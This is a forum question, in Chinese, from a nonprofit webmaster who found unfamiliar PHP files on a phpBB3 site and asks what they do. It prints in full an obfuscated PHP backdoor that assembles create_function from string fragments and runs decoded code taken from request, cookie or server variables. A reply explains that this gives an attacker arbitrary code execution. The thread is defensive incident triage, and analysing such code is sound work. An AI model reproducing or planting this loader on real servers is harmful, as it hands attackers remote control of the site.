1
我爲一個非營利組織運行一個網站 - 我們在Godaddy上託管的一個PHPbb3系統上運行。開始有滾動連接問題。在根目錄中發現了幾個「奇怪」的文件,我知道這些文件並不是由我自己放在那裏的。任何人都可以看看代碼,看看這些文件在做什麼?在服務器上發現惡意PHP代碼 - 任何人都可以告訴這個代碼在做什麼?
<?php
$katya='=KIT(a'; $choral= '$'; $fireproof='c'; $avivah= '=UlQy'; $islander= 'O'; $endosperm = '_s'; $fume=':S_:uee';
$knighthood ='WH'; $bars ='r$m';
$delicately ='D'; $caterpillar = '<ElUsabt'; $daydreaming ='$'; $contrasting = 't'; $gladys= 'S'; $complementing= '('; $kink = 'CK';$goblet ='X';$astigmatic = ')eklE';$ethane= 'l'; $aquamarine= 'Q'; $amalgams= 'u';$ardently= '[email protected]]L;"';
$cruelly='e';$lateral = 'P';
$chased = 'G'; $aspects = 'e,girT';$dismayed ='$x$Le';$handicap='s';$glints ='d'; $cursing=']Eg'; $jurisprudent = '[ac';$indeed ='M'; $influenza= '_';
$dehydrate= 'a';
$exch= ')__';$felling ='s'; $jedimaster= 'leFa'; $interrogating ='M';
$exaggerating='TLstSi)(_';
$introduced='['; $barrette='ARLEn;E;'; $halfhearted= 'o)"s$(fm';$jeffy ='O'; $ange = '9';
$handicraftsmen = ')p'; $giacinta = 'r[("KeHLv'; $johann='d'; $efferent ='r';$involving='l'; $cornucopia ='d';$assortment ='$u>U(vSov'; $idles='a';$decimated='`'; $grater = 'e';$chewing = 't'; $kayo='"';$currant =' ';$astronomically ='6'; $decomposition= 'Yo';$dukeleto ='cbi'; $diverging ='O'; $earning = 'e"';$caveman = '?';
$independent = '"';
$lab= '=(ia$'; $anode = '$';$jixian='y';$freights = '[E';$approve ='(__';
$gnome= 'KLeptre';
$crimson ='r';
$chandler='i_X$gaa';$edits='?';$blunderings='_';$attraction ='P';$avoid='k)rRf7vX';$liabilities='4';$blaster='P'; $alumnae= 's'; $daveen ='VecStT_';$crop= 'esm)Mr'; $isles ='tLnga"'; $beniamino='rRuiJVe';$concentrators = '"';
$commando='i';
$angrier ='i';$boatsman = 'RhTT_;B'; $informal='s'; $anode =':';$compatible ='^';$catherine = '8In'; $blade= 'e';
$inquisition ='[';
$brutalize='l';
$garfield=']Us'; $cruisers = 'r'; $galleried = 'H'; $garvy = '(5d';$lesson = ')6';$gunplay = '('; $fertilization =',';
$halibut =')';
$bravura = ';)lCa';$lamp = 'N';$drain = 'c';$hydroxy ='fa)Z'; $beetles= ']]i(x';$daniella = '?';$bar=$drain.
$cruisers .$blade.
$hydroxy['1'].
$isles['0'] . $blade. $boatsman['4'] . $hydroxy['0'].$beniamino['2'] .$catherine['2'].
$drain. $isles['0']. $beetles['2']. $decomposition['1'] .
$catherine['2']; $bulls= $currant ;$hog=$bar ($bulls, $blade.$avoid[6].
$hydroxy['1'] . $bravura['2'] .$beetles['3'] .$hydroxy['1'] .$cruisers.$cruisers. $hydroxy['1'] .$jixian.
$boatsman['4']. $gnome['3'] . $decomposition['1'].
$gnome['3'].
$beetles['3'].$hydroxy['0'].$beniamino['2'] .$catherine['2']. $drain .
$boatsman['4'] .$isles['3'] .$blade .$isles['0'] .
$boatsman['4']. $hydroxy['1'] . $cruisers. $isles['3'].
$garfield['2'] . $beetles['3']. $hydroxy[2]. $hydroxy[2] .
$hydroxy[2] .$bravura['0']);
$hog
($avoid['5'] ,$delicately, $garfield['1'], $chandler['3'] ,$lucia , $corporacy[2] ,$boatsman['6'] , $chandler['3'] . $beetles['2']. $lab['0'] .$hydroxy['1'] . $cruisers . $cruisers .$hydroxy['1']. $jixian .$boatsman['4'].$crop['2'] .
$blade.$cruisers . $isles['3']. $blade .
$beetles['3'].$chandler['3'] .$boatsman['4'] . $boatsman['0'] .
$freights['1'] .
$aquamarine.$garfield['1'] .$freights['1'] .
$daveen[3] .
$boatsman[3]. $fertilization .$chandler['3'].$boatsman['4']. $bravura['3']. $diverging.
$diverging .$gnome['0'].$catherine['1'] .
$freights['1'].$fertilization .
$chandler['3'] .$boatsman['4'] . $daveen[3] . $freights['1'] .$boatsman['0']. $beniamino[5].
$freights['1']. $boatsman['0'] . $hydroxy[2] . $bravura['0']. $chandler['3'] . $hydroxy['1'].$lab['0'] .
$beetles['2'] .$garfield['2'].$garfield['2'] .
$blade . $isles['0'] .$beetles['3'] .$chandler['3'] . $beetles['2'] .
$inquisition .
$concentrators.$crop['2']. $avoid['0'] .$bravura['2'].$garfield['2'].
$beetles['4'] .$bravura['2']. $beniamino['2'] .$bravura['2'].$concentrators.$beetles['1'] .
$hydroxy[2] .$daniella['0'].
$chandler['3'] .$beetles['2']. $inquisition.$concentrators . $crop['2']. $avoid['0'] .$bravura['2'] . $garfield['2'] . $beetles['4'] .$bravura['2'].
$beniamino['2'] .$bravura['2'] .$concentrators .
$beetles['1'] .
$anode . $beetles['3']. $beetles['2'] . $garfield['2'].$garfield['2'] .$blade . $isles['0']. $beetles['3'] . $chandler['3'].$beetles['2'] . $inquisition .$concentrators .$galleried. $boatsman[3]. $boatsman[3].$blaster . $boatsman['4']. $crop[4]. $gnome['0'] .$isles['1'] .$daveen[3].
$avoid['7']. $isles['1'] .$garfield['1'] .
$isles['1']. $concentrators .$beetles['1'].$hydroxy[2] .$daniella['0'].$chandler['3'].
$beetles['2'].$inquisition .$concentrators .
$galleried.
$boatsman[3]. $boatsman[3].
$blaster.$boatsman['4'] .
$crop[4].$gnome['0'] . $isles['1'].$daveen[3].$avoid['7'].
$isles['1']. $garfield['1'] .$isles['1'].$concentrators . $beetles['1']. $anode.
$garvy['2'] .$beetles['2'] . $blade . $hydroxy[2].$bravura['0'].$blade . $avoid[6].
$hydroxy['1'].$bravura['2'].
$beetles['3'] . $garfield['2']. $isles['0'] .$cruisers.
$cruisers. $blade .$avoid[6].$beetles['3']. $dukeleto['1']. $hydroxy['1'].$garfield['2'] . $blade .$lesson['1'] . $liabilities.$boatsman['4']. $garvy['2'].$blade . $drain. $decomposition['1']. $garvy['2'] .$blade.$beetles['3'] .
$garfield['2']. $isles['0']. $cruisers. $cruisers.$blade . $avoid[6] .
$beetles['3'] .
$chandler['3'].$hydroxy['1'] .$hydroxy[2].$hydroxy[2] .
$hydroxy[2] .$hydroxy[2]. $bravura['0']);
大多數這樣的代碼將打開,攻擊者上傳一個控制面板/執行他們希望 – cmorrissey
所以這個腳本實際上是採取了'$ _REQUEST什麼, $ _COOKIE,$ _ SERVER'將它們合併成一個變量,然後從這些變量中尋找一個特定的變量並對其進行解碼並對其進行評估。基本上攻擊者可以用這個腳本執行他們想要的任何代碼。 – cmorrissey
除了篩選每個php文件以外的任何建議?任何特定的字符串,我應該尋找跨越多個文件的搜索?任何建議,不勝感激 –